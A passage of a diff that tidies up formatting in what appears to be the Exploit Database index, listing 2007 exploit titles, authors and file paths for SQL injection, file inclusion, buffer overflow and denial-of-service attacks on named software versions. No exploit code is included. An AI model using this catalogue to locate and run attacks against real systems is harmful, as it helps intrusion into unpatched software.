Inclusion",2007-03-28,GoLd_M,php,webapps,0 @@ -3385,7 +3386,7 @@ id,file,description,date,author,platform,type,port 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 -3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 +3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 @@ -3423,7 +3424,7 @@ id,file,description,date,author,platform,type,port 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 -3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - '.WMV'Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0 +3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion",2007-04-21,GoLd_M,php,webapps,0 @@ -3431,10 +3432,10 @@ id,file,description,date,author,platform,type,port 3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 -3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.XPM'Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 -3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.XPM'Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 -3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - login.php absolute_path Remote File Inclusion Exploit",2007-04-23,g00ns,php,webapps,0 -3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.CLP'Buffer Overflow",2007-04-23,Marsu,windows,local,0 +3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 +3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 +3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion Exploit",2007-04-23,g00ns,php,webapps,0 +3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow",2007-04-23,Marsu,windows,local,0 3780,platforms/php/webapps/3780.pl,"MyBulletinBoard - (MyBB) 1.2.5 calendar.php Blind SQL Injection",2007-04-23,0x86,php,webapps,0 3781,platforms/php/webapps/3781.txt,"Joomla 1.5.0 Beta - (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 3782,platforms/windows/dos/3782.pl,"Winamp 5.33 - '.avi' Remote Denial of Service",2007-04-23,DeltahackingTEAM,windows,dos,0 @@ -3452,11 +3453,11 @@ id,file,description,date,author,platform,type,port 3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion",2007-04-24,DamaR,php,webapps,0 3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion Exploit",2007-04-24,kezzap66345,php,webapps,0 -3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.PSP'Buffer Overflow",2007-04-25,Marsu,windows,local,0 -3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.PSP'Buffer Overflow",2007-04-25,Marsu,windows,local,0 +3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 +3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 -3801,platforms/windows/local/3801.c,"Gimp 2.2.14 - '.ras'SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local,0 +3801,platforms/windows/local/3801.c,"Gimp 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local,0 3802,platforms/php/webapps/3802.txt,"PHPBandManager 0.8 - (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 3803,platforms/php/webapps/3803.txt,"PHPOracleView - (include_all.inc.php page_dir) Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3804,platforms/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 @@ -3466,19 +3467,19 @@ id,file,description,date,author,platform,type,port 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 -3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff'Buffer Overflow",2007-04-27,Marsu,windows,local,0 -3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png'Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 +3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 +3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"Wordpress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 -3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra'Remote Denial of Service",2007-04-30,n00b,windows,dos,0 +3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows/x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0 -3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4'Code Execution Exploit",2007-04-30,Marsu,windows,local,0 +3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution Exploit",2007-04-30,Marsu,windows,local,0 3824,platforms/php/webapps/3824.txt,"Wordpress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3825,platforms/php/webapps/3825.txt,"Wordpress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 @@ -3518,7 +3519,7 @@ id,file,description,date,author,platform,type,port 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 -3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep'Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 +3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 @@ -3605,7 +3606,7 @@ id,file,description,date,author,platform,type,port 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 - COM Object Remote Stack Overflow",2007-05-18,shinnai,windows,remote,0 3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow Exploit",2007-05-18,shinnai,windows,remote,0 -3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.DLL'Buffer Overflow Exploit",2007-05-18,shinnai,windows,remote,0 +3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Buffer Overflow Exploit",2007-05-18,shinnai,windows,remote,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection",2007-05-20,NeoMorphS,php,webapps,0 @@ -3625,7 +3626,7 @@ id,file,description,date,author,platform,type,port 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 -3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path'Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 +3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,windows,dos,0 3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - .cue File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 @@ -3746,7 +3747,7 @@ id,file,description,date,author,platform,type,port 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 -4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit'SQL Injection",2007-06-24,Kacper,php,webapps,0 +4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 @@ -3834,7 +3835,7 @@ id,file,description,date,author,platform,type,port 4184,platforms/php/webapps/4184.txt,"Realtor 747 - 'index.php categoryid' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - 'directory.php cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - 'search.php' SQL Injection",2007-07-14,pUm,php,webapps,0 -4187,platforms/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php offset'SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 +4187,platforms/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php offset' SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)",2007-07-16,yunshu,windows,remote,0 4189,platforms/php/webapps/4189.txt,"Expert Advisior - 'index.php id' SQL Injection",2007-07-17,t0pP8uZz,php,webapps,0 4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar - ActiveX (actbar3.ocx 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 @@ -3842,9 +3843,9 @@ id,file,description,date,author,platform,type,port 4192,platforms/php/webapps/4192.htm,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,php,webapps,0 4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - (insertorder.cfm) SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 -4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php p_mode'Remote File Inclusion",2007-07-18,mozi,php,webapps,0 +4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 -4197,platforms/php/webapps/4197.txt,"PHPBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 +4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 4200,platforms/windows/remote/4200.html,"Versalsoft HTTP File Uploader - AddFile() Remote Buffer Overflow",2007-07-19,shinnai,windows,remote,0 @@ -3859,7 +3860,7 @@ id,file,description,date,author,platform,type,port 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 Beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 -4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID'SQL Injection",2007-07-22,g00ns,php,webapps,0 +4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 @@ -3875,7 +3876,7 @@ id,file,description,date,author,platform,type,port 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - SUBSCRIBE Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 -4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls'Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 +4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 @@ -3887,7 +3888,7 @@ id,file,description,date,author,platform,type,port 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 -4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat'SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 +4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 @@ -3898,20 +3899,20 @@ id,file,description,date,author,platform,type,port 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow",2007-07-31,lhoang8500,windows,remote,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0 -4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay'Buffer Overflow",2007-08-01,n00b,windows,local,0 +4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS - (Forum Module) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - (CkString.dll 1.1) SaveToFile() Insecure Method",2007-08-05,shinnai,windows,remote,0 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 -4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe'Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 +4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 -4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply'Buffer Overflow",2007-08-06,n00b,windows,local,0 -4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - '.spr'Buffer Overflow",2007-08-06,n00b,windows,local,0 -4264,platforms/cgi/webapps/4264.txt,"CartWeaver - 'Details.cfm ProdID'SQL Injection",2007-08-06,meoconx,cgi,webapps,0 -4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'directory.php cat'SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 +4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Buffer Overflow",2007-08-06,n00b,windows,local,0 +4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - '.spr' Buffer Overflow",2007-08-06,n00b,windows,local,0 +4264,platforms/cgi/webapps/4264.txt,"CartWeaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 @@ -3930,14 +3931,14 @@ id,file,description,date,author,platform,type,port 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x - SIP Phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 -4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat'SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 +4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"SurgeMail 38k - (SEARCH) Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 -4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query'SQL Injection",2007-08-16,RoXur777,php,webapps,0 +4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 @@ -3958,7 +3959,7 @@ id,file,description,date,author,platform,type,port 4309,platforms/php/webapps/4309.txt,"Joomla Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0 -4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 +4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 @@ -4032,7 +4033,7 @@ id,file,description,date,author,platform,type,port 4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante - Remote File Upload",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 -4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f'Remote File Download",2007-09-10,k-one,php,webapps,0 +4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0 